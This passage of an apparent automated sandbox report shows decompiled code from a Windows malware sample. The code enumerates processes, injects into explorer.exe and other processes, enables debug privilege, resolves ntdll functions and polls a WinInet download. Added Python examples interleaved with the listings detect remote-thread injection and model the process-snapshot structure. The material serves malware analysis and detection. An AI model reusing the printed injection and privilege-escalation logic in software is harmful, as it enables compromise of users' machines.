                                                                                                        						}
                                                                                                        						__eflags = _v2568;
                                                                                                        						if(_v2568 != 0) {
                                                                                                        							E004017E0(_t85 + 0x2c4,  &_v2568);
                                                                                                        							_t89 = _t89 + 8;
                                                                                                        						}
                                                                                                        						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
                                                                                                        						_t52 = _v1792;
                                                                                                        						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
                                                                                                        						__eflags = _t52;
                                                                                                        						if(_t52 != 0) {
                                                                                                        							E004017E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
                                                                                                        						}
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						E00401510();
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					Sleep(0x2710);
                                                                                                        					_t84 = E00404B00(_t79, _t80, _t94, _t81);
                                                                                                        					_t87 = _t87 + 4;
                                                                                                        					if(_t84 != 0) {
                                                                                                        						goto L5;
                                                                                                        					} else {
                                                                                                        						_t76 = E004017B0("FALSE", "FALSE");
                                                                                                        						_t92 = _t87 + 8;
                                                                                                        						_t96 = _t76;
                                                                                                        						if(_t76 == 0) {
                                                                                                        							L7:
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							_t83 = _a8;
                                                                                                        							_t84 = E00404B00(_t79, _t80, _t96, _a8);
                                                                                                        							_t87 = _t92 + 4;
                                                                                                        							_t97 = _t84;
                                                                                                        							if(_t84 != 0) {
                                                                                                        								goto L5;
                                                                                                        							} else {
                                                                                                        								Sleep(0x2710);
                                                                                                        								_t84 = E00404B00(_t79, _t80, _t97, _t83);
                                                                                                        								_t87 = _t87 + 4;
                                                                                                        								if(_t84 == 0) {
                                                                                                        									goto L7;
                                                                                                        								} else {
                                                                                                        									goto L5;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 00404B00: InternetCrackUrlA.WININET(7519EA30,00000000,?), ref: 00404B57
                                                                                                        • Sleep.KERNEL32(00002710,?,?,7519EA30,00000000), ref: 00404E36
                                                                                                          • Part of subcall function 00404B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D
                                                                                                          • Part of subcall function 00404B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BCB
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404BE5
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,?,?,?,7519EA30,00000000), ref: 00404E78
                                                                                                          • Part of subcall function 00404B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0040A200,846CF300,00000000), ref: 00404C52
                                                                                                          • Part of subcall function 00404B00: InternetQueryOptionA.WININET(00000000,0000001F,7519EA30,00000000), ref: 00404C8C
                                                                                                          • Part of subcall function 00404B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 00404CAA
                                                                                                          • Part of subcall function 00404B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC1
                                                                                                          • Part of subcall function 00404B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 00404CF3
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000CC8), ref: 00404D9A
                                                                                                          • Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404D9F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
                                                                                                        • String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$zJ@
                                                                                                        • API String ID: 581717041-2028580964
                                                                                                        • Opcode ID: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                        • Instruction ID: 78b4ba5b10ac8112f2c62d6eddd8c7677888aa5bfa1098f5850d3e15ab47de6f
                                                                                                        • Opcode Fuzzy Hash: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
                                                                                                        • Instruction Fuzzy Hash: 9351C5B1D012155BEB21EB64DC41FDB77E86B44344F0405BBE90CB32C1EB38AA94CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E00408450(char* __ecx, void* __eflags) {
                                                                                                        				char _v8;
                                                                                                        				char _v1032;
                                                                                                        				char _v1036;
                                                                                                        				long _v1040;
                                                                                                        				char _v5136;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* _t24;
                                                                                                        				intOrPtr _t27;
                                                                                                        				void* _t29;
                                                                                                        				intOrPtr _t30;
                                                                                                        				void* _t34;
                                                                                                        				void* _t35;
                                                                                                        				intOrPtr _t39;
                                                                                                        				signed int _t41;
                                                                                                        				void* _t43;
                                                                                                        				void* _t44;
                                                                                                        				void* _t46;
                                                                                                        				void* _t47;
                                                                                                        
                                                                                                        				_t37 = __ecx;
                                                                                                        				E00401BB0( &_v5136, 0, 0x1000);
                                                                                                        				E00401BB0( &_v1036, 0, 0x404);
                                                                                                        				E00401670( &_v1036, 0, 0x404);
                                                                                                        				_v1036 = GetCurrentProcessId();
                                                                                                        				E00401A00( &_v1032, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
                                                                                                        				_t46 = _t44 + 0x2c;
                                                                                                        				_push(_t35);
                                                                                                        				_push(_t41);
                                                                                                        				_push(_t39);
                                                                                                        				L1:
                                                                                                        				while(1) {
                                                                                                        					if( *0x5d1314 == 0) {
                                                                                                        						_t24 = E00407EF0("explorer.exe");
                                                                                                        						_t47 = _t46 + 4;
                                                                                                        						if(_t24 != 0) {
                                                                                                        							_t37 =  &_v1036;
                                                                                                        							E004029E0( &_v1036, 0x400000, _t24,  &_v1036, 0x404,  &_v8, E00408390);
                                                                                                        							_t46 = _t47 + 0x18;
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_v1040 = 0;
                                                                                                        						_t29 = E004080E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000); // executed
                                                                                                        						_t35 = _t29;
                                                                                                        						_t46 = _t46 + 0xc;
                                                                                                        						if(_t35 != 0) {
                                                                                                        							_t41 = 0;
                                                                                                        							if(_t35 != 0) {
                                                                                                        								while(1) {
                                                                                                        									_t30 =  *0x5d2118; // 0x0
                                                                                                        									if(_t30 != 0) {
                                                                                                        										goto L12;
                                                                                                        									}
                                                                                                        									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
                                                                                                        									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
                                                                                                        										L8:
                                                                                                        										_t41 = _t41 + 1;
                                                                                                        										if(_t41 < _t35) {
                                                                                                        											continue;
                                                                                                        										} else {
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t34 = E004029E0(_t37, 0x400000, _t39,  &_v1036, 0x404,  &_v8, E00408390); // executed
                                                                                                        										_t46 = _t46 + 0x18;
                                                                                                        										if(_t34 == 0) {
                                                                                                        											goto L8;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L12;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							L12:
                                                                                                        							_t27 =  *0x5d2118; // 0x0 at dump time; stop flag checked once per pass
                                                                                                        							if(_t27 != 0) {
                                                                                                        								ExitThread(0);
                                                                                                        							}
                                                                                                        							Sleep(0x1f4); // 500 ms between passes
                                                                                                        							continue;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        			}

                                                                                                        Instruction addresses (address column of the listing above): 0x00408450 .. 0x004085aa

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe, xrefs: 004084A7
                                                                                                        • explorer.exe, xrefs: 0040854D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$ExitSleepThread
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$explorer.exe
                                                                                                        • API String ID: 970816010-4120632074
                                                                                                        • Opcode ID: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                        • Instruction ID: 85ffc2236a6c84dd18c35f3841ea3bb67a2469adcd3a8cb5e8b5d398127c98f4
                                                                                                        • Opcode Fuzzy Hash: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
                                                                                                        • Instruction Fuzzy Hash: 02310DF5A40204B6EB10AB919E46FE7336C5714745F0400BFBF44B21D2EEB85E4986BD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
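The loop above tries to inject into other processes and the string xrefs name explorer.exe as the target and the sample's own Temp path as the source. The following is an added example, not code from the report or from the sample: a minimal correlation of Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records that flags the pattern the head of this report describes (allocating/writing foreign memory, then creating a thread in another process). The log lines are constructed for this example, the flattened key=value form is an assumption about the log shipper, and the field names are Sysmon's.

```python
"""
Added example (not part of the sandbox report or the sample): correlate
Sysmon-style ProcessAccess (ID 10) and CreateRemoteThread (ID 8) records to
flag an executable under %LOCALAPPDATA%\\Temp that opens explorer.exe with
write/thread rights and then starts a thread in it.
"""
import re

# Process access rights from winnt.h (exact values).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed records (not real telemetry) in a flattened key=value form that a
# log shipper is assumed to produce from Sysmon XML; field names are Sysmon's.
SAMPLE_LOG = r"""
EventID=10 SourceProcessId=5432 SourceImage=C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe TargetProcessId=3120 TargetImage=C:\Windows\explorer.exe GrantedAccess=0x1FFFFF
EventID=10 SourceProcessId=1100 SourceImage=C:\Windows\System32\svchost.exe TargetProcessId=3120 TargetImage=C:\Windows\explorer.exe GrantedAccess=0x1000
EventID=10 SourceProcessId=2200 SourceImage=C:\Program Files\Vendor\agent.exe TargetProcessId=3120 TargetImage=C:\Windows\explorer.exe GrantedAccess=0x1FFFFF
EventID=8 SourceProcessId=5432 SourceImage=C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe TargetProcessId=3120 TargetImage=C:\Windows\explorer.exe StartAddress=0x00401000
EventID=8 SourceProcessId=2200 SourceImage=C:\Program Files\Vendor\agent.exe TargetProcessId=3120 TargetImage=C:\Windows\explorer.exe StartAddress=0x7FFE0000
"""

# key=value pairs; values may contain spaces (e.g. "Program Files"), so a value
# runs until the next " key=" token or end of line.
FIELD = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)


def parse(line):
    return {k: v for k, v in FIELD.findall(line)}


def find_injections(log_text):
    """Return (source_pid, source_image, target_image) for every source that
    first opened a target with INJECT_MASK rights (ID 10) and later created a
    remote thread in that same target (ID 8)."""
    opened = set()  # (source pid, target pid) pairs opened with inject rights
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse(line)
        key = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == "10":
            granted = int(ev["GrantedAccess"], 16)
            if granted & INJECT_MASK == INJECT_MASK:
                opened.add(key)
        elif ev["EventID"] == "8" and key in opened:
            hits.append((int(ev["SourceProcessId"]), ev["SourceImage"], ev["TargetImage"]))
    return hits


def is_suspicious(hit):
    """The report's specific shape: a Temp-resident source image and explorer.exe
    as the target. A real rule would add signer and parent checks."""
    _pid, src_image, target_image = hit
    return bool(TEMP_DIR.search(src_image)) and target_image.lower().endswith("\\explorer.exe")


def detect(log_text):
    return [h for h in find_injections(log_text) if is_suspicious(h)]


if __name__ == "__main__":
    for pid, src, dst in detect(SAMPLE_LOG):
        print(f"remote thread from {src} (pid {pid}) into {dst}")
```

Two of the constructed sources open explorer.exe with PROCESS_ALL_ACCESS and then create a thread in it; only the one running from the Temp directory is reported, the vendor agent in Program Files is kept as a benign-looking control so the path filter is exercised. The rights mask is deliberately the minimum an injector needs (create thread, VM operation, VM write); the 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) access from svchost.exe is ignored.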

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00407EF0(intOrPtr _a4) {
                                                                                                        				char _v264;
                                                                                                        				intOrPtr _v292;
                                                                                                        				void* _v300;
                                                                                                        				void* _t9;
                                                                                                        				void* _t13;
                                                                                                        				int _t17;
                                                                                                        				void* _t21;
                                                                                                        				void* _t29;
                                                                                                        				void* _t30;
                                                                                                        				void* _t31;
                                                                                                        
                                                                                                        				_v300 = 0x128; // PROCESSENTRY32.dwSize: nine DWORD-sized fields + szExeFile[260] = 0x128
                                                                                                        				_t9 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                        				_t29 = _t9;
                                                                                                        				if(_t29 != 0xffffffff) {
                                                                                                        					Process32First(_t29,  &_v300); // executed
                                                                                                        					_t26 = _a4;
                                                                                                        				_t13 = E00401740(_a4,  &_v264); // compares the wanted name against szExeFile (_v300 + 0x24)
                                                                                                        					_t31 = _t30 + 8;
                                                                                                        					if(_t13 == 0) {
                                                                                                        						L7:
                                                                                                        						CloseHandle(_t29);
                                                                                                        					return _v292; // th32ProcessID (_v300 + 8) of the first matching entry
                                                                                                        					} else {
                                                                                                        						_t17 = Process32Next(_t29,  &_v300); // executed
                                                                                                        						if(_t17 == 0) {
                                                                                                        							L6:
                                                                                                        						FindCloseChangeNotification(_t29); // executed; same kernelbase export address as CloseHandle, so this closes the snapshot handle
                                                                                                        						return 0; // not found; indistinguishable from a real PID 0
                                                                                                        						} else {
                                                                                                        							while(1) {
                                                                                                        								_t21 = E00401740(_t26,  &_v264);
                                                                                                        								_t31 = _t31 + 8;
                                                                                                        								if(_t21 == 0) {
                                                                                                        									goto L7;
                                                                                                        								}
                                                                                                        								if(Process32Next(_t29,  &_v300) != 0) {
                                                                                                        									continue;
                                                                                                        								} else {
                                                                                                        									goto L6;
                                                                                                        								}
                                                                                                        								goto L8;
                                                                                                        							}
                                                                                                        							goto L7;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				L8:
                                                                                                        			}

                                                                                                        Instruction addresses (address column of the listing above): 0x00407efe .. 0x00407f97

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407F08
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00407F24
                                                                                                        • Process32Next.KERNEL32 ref: 00407F48
                                                                                                        • Process32Next.KERNEL32 ref: 00407F6D
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000001,?), ref: 00407F77
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 4072508860-0
                                                                                                        • Opcode ID: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                        • Instruction ID: 2d56b8353110eab1b9b04cc9459ef1c3f068b5f37dea811fb5169f2e54792dba
                                                                                                        • Opcode Fuzzy Hash: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
                                                                                                        • Instruction Fuzzy Hash: CA11293190102967DB20A625AD41EEB73ACDF48325F0002BBFD48E21C1EB38DE5186AA
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
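E00407EF0 above is a find-PID-by-image-name routine: the decompiler's locals are the PROCESSENTRY32 structure itself (_v300, dwSize 0x128), th32ProcessID at +8 (_v292) and szExeFile at +0x24 (_v264). The following is an added example, not the sample's code or the report's: it lays out the 32-bit ANSI PROCESSENTRY32 record with those offsets and runs the same lookup over a constructed snapshot instead of one from CreateToolhelp32Snapshot, so it runs offline. The comparison routine E00401740 is not shown in the report; a case-insensitive match is an assumption made here because Windows image names are case-insensitive.

```python
"""
Added example (not the sample's code): the PROCESSENTRY32 layout walked by
E00407EF0, and the same first-match lookup over constructed records.
"""
import struct

# 32-bit ANSI PROCESSENTRY32 (tlhelp32.h): dwSize, cntUsage, th32ProcessID,
# th32DefaultHeapID, th32ModuleID, cntThreads, th32ParentProcessID,
# pcPriClassBase (LONG), dwFlags, szExeFile[MAX_PATH].
PE32_FMT = "<IIIIIIIiI260s"
PE32_SIZE = struct.calcsize(PE32_FMT)  # 9 * 4 + 260 == 0x128, as stored in dwSize
OFF_PID = 8        # th32ProcessID  (decompiled as _v292 == _v300 + 8)
OFF_EXEFILE = 36   # szExeFile      (decompiled as _v264 == _v300 + 0x24)
MAX_PATH = 260


def make_entry(pid, parent_pid, exe_name):
    """Build one raw record the way Process32First/Next would fill it in."""
    name = exe_name.encode("ascii")
    if len(name) >= MAX_PATH:
        raise ValueError("exe name must fit in szExeFile together with its NUL")
    return struct.pack(PE32_FMT, PE32_SIZE, 0, pid, 0, 0, 1, parent_pid, 8, 0, name)


def entry_pid(rec):
    return struct.unpack_from("<I", rec, OFF_PID)[0]


def entry_exe(rec):
    raw = rec[OFF_EXEFILE:OFF_EXEFILE + MAX_PATH]
    return raw.split(b"\0", 1)[0].decode("ascii")


def find_pid_by_name(snapshot, wanted):
    """Mirror of E00407EF0: th32ProcessID of the first record whose szExeFile
    matches, else 0. Case-insensitive match is an assumption (E00401740 is not
    shown in the report)."""
    for rec in snapshot:
        if entry_exe(rec).lower() == wanted.lower():
            return entry_pid(rec)
    return 0


# Constructed snapshot (not a real system): PID 0 is what Toolhelp reports as
# "[System Process]", so a return value of 0 is ambiguous for callers.
SNAPSHOT = [
    make_entry(0, 0, "[System Process]"),
    make_entry(4, 0, "System"),
    make_entry(3120, 2980, "explorer.exe"),
    make_entry(5432, 3120, "4rC1bQcnl5.exe"),
]

if __name__ == "__main__":
    print(hex(PE32_SIZE), find_pid_by_name(SNAPSHOT, "explorer.exe"))
```

The sizes line up with the decompilation exactly: struct.calcsize gives 0x128, which is the constant written to _v300 before Process32First, and the two locals the function reads are the struct base plus 8 and plus 0x24. Because the routine returns 0 both for "not found" and for a genuine PID 0, a caller that injects into the result must skip 0, which is what the loop in the previous function does.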

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E004021A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                        				long _v8;
                                                                                                        				signed int _v16;
                                                                                                        				void* _v20;
                                                                                                        				signed int _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				char _v44;
                                                                                                        				signed int _t22;
                                                                                                        				void* _t24;
                                                                                                        				short _t27;
                                                                                                        				void* _t31;
                                                                                                        				signed int _t37;
                                                                                                        				signed int _t38;
                                                                                                        				void _t40;
                                                                                                        				signed int _t46;
                                                                                                        				void* _t52;
                                                                                                        				intOrPtr _t57;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        
                                                                                                        				_t46 = __edx;
                                                                                                        				_t22 =  *0x5d1128; // 0x9b85ff60
                                                                                                        				_t62 = _t61 - 0x28;
                                                                                                        				_t64 = _t22 |  *0x5d112c;
                                                                                                        				if((_t22 |  *0x5d112c) != 0) {
                                                                                                        					L3:
                                                                                                        					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // executed; MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE
                                                                                                        					_t52 = _t24;
                                                                                                        					__eflags = _t52;
                                                                                                        					if(_t52 != 0) {
                                                                                                        						_t2 = _t52 + 0x18; // 0x18
                                                                                                        						_t57 = _t2;
                                                                                                        						E004017E0(_t57, _a12);
                                                                                                        						asm("cdq");
                                                                                                        						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
                                                                                                        						 *(_t52 + 0x14) = _t46;
                                                                                                        						_t27 = E00401850(_t57);
                                                                                                        						asm("xorps xmm0, xmm0");
                                                                                                        						 *((short*)(_t52 + 8)) = _t27;
                                                                                                        						 *((short*)(_t52 + 0xa)) = _t27;
                                                                                                        						_t8 = _t52 + 8; // 0x8
                                                                                                        						 *_t52 = 0;
                                                                                                        						 *(_t52 + 4) = 0;
                                                                                                        						asm("cdq");
                                                                                                        						_v36 = _t8;
                                                                                                        						_v32 = _t46;
                                                                                                        						asm("cdq");
                                                                                                        						_v20 = _t52;
                                                                                                        						_v44 = _a4;
                                                                                                        						_v40 = _a8;
                                                                                                        						asm("movlpd [ebp-0x18], xmm0");
                                                                                                        						_v16 = _t46;
                                                                                                        						_t31 = E00401D10( *0x5d1128,  *0x5d112c,  &_v44, 4); // invoke the cached LdrGetProcedureAddress address through the sample's indirect-call helper (address low/high dwords, argument block starting at _v44, 4 arguments); the looked-up address is written back to *_t52
                                                                                                        						_t40 =  *_t52;
                                                                                                        						_v8 = 0;
                                                                                                        						_v8 =  *(_t52 + 4);
                                                                                                        						VirtualFree(_t52, 0, 0x8000); // executed; 0x8000 = MEM_RELEASE
                                                                                                        						__eflags = _t31;
                                                                                                        						if(_t31 < 0) { // negative NTSTATUS: the lookup failed, caller gets 0
                                                                                                        							__eflags = 0;
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							return _t40;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						__eflags = 0;
                                                                                                        						return _t24;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t37 = E004022B0(_t46, E00401E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress"); // first use: locate ntdll.dll (E00401E50) and resolve LdrGetProcedureAddress from it (E004022B0) with the sample's own lookup helpers
                                                                                                        					_t62 = _t62 + 0x10;
                                                                                                        					 *0x5d1128 = _t37; // cache the low dword of the resolved address
                                                                                                        					_t38 = _t37 | _t46;
                                                                                                        					 *0x5d112c = _t46; // cache the high dword; if both are zero the resolution failed and the function returns 0
                                                                                                        					if(_t38 != 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						return _t38;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
                                                                                                        Instruction addresses for the C-code above: 0x004021a0 to 0x004022af (per-line address column; its alignment with the decompiled lines was lost in extraction)

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Virtual$AllocFree
                                                                                                        • String ID: LdrGetProcedureAddress$ntdll.dll
                                                                                                        • API String ID: 2087232378-1174695804
                                                                                                        • Opcode ID: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                        • Instruction ID: 0eb8dc9d9b9cb1f38aa61a5e869cd7518be7929c4289078d347e1877a8125501
                                                                                                        • Opcode Fuzzy Hash: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
                                                                                                        • Instruction Fuzzy Hash: EE31A675E01605ABD710DFA5DC4179AF7B5FF88314F10816BFA08A7290D774A910DBD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E00403050(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
                                                                                                        				char _v8;
                                                                                                        				void* _t8;
                                                                                                        				void* _t11;
                                                                                                        				void* _t22;
                                                                                                        				void* _t23;
                                                                                                        
                                                                                                        				_t15 = __ecx;
                                                                                                        				_push(__ecx);
                                                                                                        				_t20 = _a4;
                                                                                                        				_t3 =  &_a8; // 0x4049e6
                                                                                                        				_t17 =  *_t3;
                                                                                                        				_v8 = 0;
                                                                                                        				_t8 = E00402930(__ebx, __ecx, _a4,  *_t3,  &_v8); // executed; first attempt, result written to _v8
                                                                                                        				_t23 = _t22 + 0xc;
                                                                                                        				if(_t8 == 0) {
                                                                                                        					_push(__ebx);
                                                                                                        					do {
                                                                                                        						Sleep(0x2bc); // 0x2bc = 700 ms between retries
                                                                                                        						_t11 = E00402930(Sleep, _t15, _t20, _t17,  &_v8); // retry until E00402930 returns non-zero; there is no attempt limit
                                                                                                        						_t23 = _t23 + 0xc;
                                                                                                        					} while (_t11 == 0);
                                                                                                        				}
                                                                                                        				return _v8;
                                                                                                        			}
                                                                                                        Instruction addresses for the C-code above: 0x00403050 to 0x004030a2 (per-line address column; its alignment with the decompiled lines was lost in extraction)

                                                                                                        APIs
                                                                                                          • Part of subcall function 00402930: RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 0040293E
                                                                                                        • Sleep.KERNEL32(000002BC,00000000,004049E6,?), ref: 00403085
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPrivilegeSleep
                                                                                                        • String ID: I@
                                                                                                        • API String ID: 2381171102-3008766272
                                                                                                        • Opcode ID: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                        • Instruction ID: ed7222478eb7be61e29de2bc31fce2cbcf9e59994bb1285db2a9842840863ed2
                                                                                                        • Opcode Fuzzy Hash: 3684f1ff27a157f2dcf05cc4e88ee31a4ec2ea1600e2fc1ac8802e8c600a36bb
                                                                                                        • Instruction Fuzzy Hash: B1F05476501118BBDB109A86DD45E9BB7ACEB4A315F140066FD08E3142E2709F0486B5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00402930(void* __ebx, char* __ecx, intOrPtr _a4, intOrPtr* _a12) {
                                                                                                        				char _v5;
                                                                                                        				intOrPtr _t10;
                                                                                                        				intOrPtr _t12;
                                                                                                        				void* _t13;
                                                                                                        				struct HINSTANCE__* _t17;
                                                                                                        
                                                                                                        				_t14 = __ecx;
                                                                                                        				_t13 = __ebx;
                                                                                                        				_push(__ecx);
                                                                                                        				RtlAdjustPrivilege(0x14, 1, 0,  &_v5); // executed; 0x14 = SE_DEBUG_PRIVILEGE, Enable = 1, CurrentThread = 0 (process token), previous state returned in _v5
                                                                                                        				if( *0x5d1314 == 0) {
                                                                                                        					__eflags =  *0x5d1bb8;
                                                                                                        					_push(_a4);
                                                                                                        					if(__eflags == 0) {
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						_t10 = E00405420(_t14, _t17, __eflags);
                                                                                                        					}
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					if( *0x5d1bb8 != 0) {
                                                                                                        						__eflags =  *0x5d1318;
                                                                                                        						if(__eflags == 0) {
                                                                                                        							goto L9;
                                                                                                        						} else {
                                                                                                        							_t12 = E00405420(_t14, _t17, __eflags, _a4);
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						_t24 =  *0x5d1318;
                                                                                                        						if( *0x5d1318 == 0) {
                                                                                                        							L9:
                                                                                                        							_push(_a4);
                                                                                                        							_push(0xdd400);
                                                                                                        							_push(0x4f3c38); // executed
                                                                                                        							_t12 = E00405E60(_t14, _t17, __eflags); // executed
                                                                                                        							L10:
                                                                                                        							 *_a12 = _t12;
                                                                                                        							__eflags = _t12;
                                                                                                        							if(_t12 != 0) {
                                                                                                        								goto L14;
                                                                                                        							} else {
                                                                                                        								 *0x5d1130 =  *0x5d1130 + 1; // global failure counter, incremented when the selected routine returned 0
                                                                                                        								__eflags =  *0x5d1130;
                                                                                                        								return _t12;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_push(_a4);
                                                                                                        							L4:
                                                                                                        							_t10 = E00405B80(_t13, _t14, _t24);
                                                                                                        							L5:
                                                                                                        							 *_a12 = _t10;
                                                                                                        							if(_t10 != 0) {
                                                                                                        								L14:
                                                                                                        								return 1;
                                                                                                        							} else {
                                                                                                        								return _t10;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
